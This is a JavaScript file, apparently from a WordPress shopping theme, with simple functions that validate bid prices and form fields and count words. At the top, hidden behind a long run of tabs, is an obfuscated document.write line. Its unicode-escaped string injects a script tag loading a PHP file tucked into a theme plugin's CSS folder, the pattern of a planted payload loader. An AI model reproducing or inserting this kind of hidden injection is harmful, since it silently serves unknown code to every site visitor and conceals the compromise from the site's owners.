																																																																							document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u002F\u0077\u0070\u002D\u0063\u006F\u006E\u0074\u0065\u006E\u0074\u002F\u0074\u0068\u0065\u006D\u0065\u0073\u002F\u0073\u0068\u006F\u0070\u0070\u0065\u0072\u0070\u0072\u0065\u0073\u0073\u002F\u0050\u0050\u0054\u002F\u006A\u0073\u002F\u0074\u0069\u006E\u0079\u005F\u006D\u0063\u0065\u002F\u0070\u006C\u0075\u0067\u0069\u006E\u0073\u002F\u0066\u0075\u006C\u006C\u0070\u0061\u0067\u0065\u002F\u0063\u0073\u0073\u002F\u006A\u0065\u006E\u006E\u002D\u0073\u0063\u0072\u0069\u0070\u0074\u0073\u002E\u0070\u0068\u0070\u0022\u003E\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");// VALIDATE BIDDING PRICE
function CheckBidValue(price,text, minval){
	 
  var ValidChars = "0123456789.";
  var IsNumber=true;
  var Char;

  if(price ==''){alert(text);return false;} 	
	
   for (i = 0; i < price.length && IsNumber == true; i++){ 
   
      Char = price.charAt(i); 
      if (ValidChars.indexOf(Char) == -1){
		  
         alert(text);
		 return false;
		 
         }		 
     }

	if(price <= minval){
		alert(text);
		return false;
	}
	
	
	return true;
	
}

function CheckMessageData(a,b,c,text){
	 
	if(a =='' || b =='' || c ==''){
	
		alert(text);
		return false;
	
	}
	
	return true;
	
	
}

function countWords(heyslay){
	heyslay=heyslay.split("\n").join(" ");
	chocolate=heyslay.split(" ");
	heyslay=0;
	for(da=0;da<chocolate.length;da++){
		if(chocolate[da].length>0){
			heyslay++;
		}
	}
	return heyslay;
}
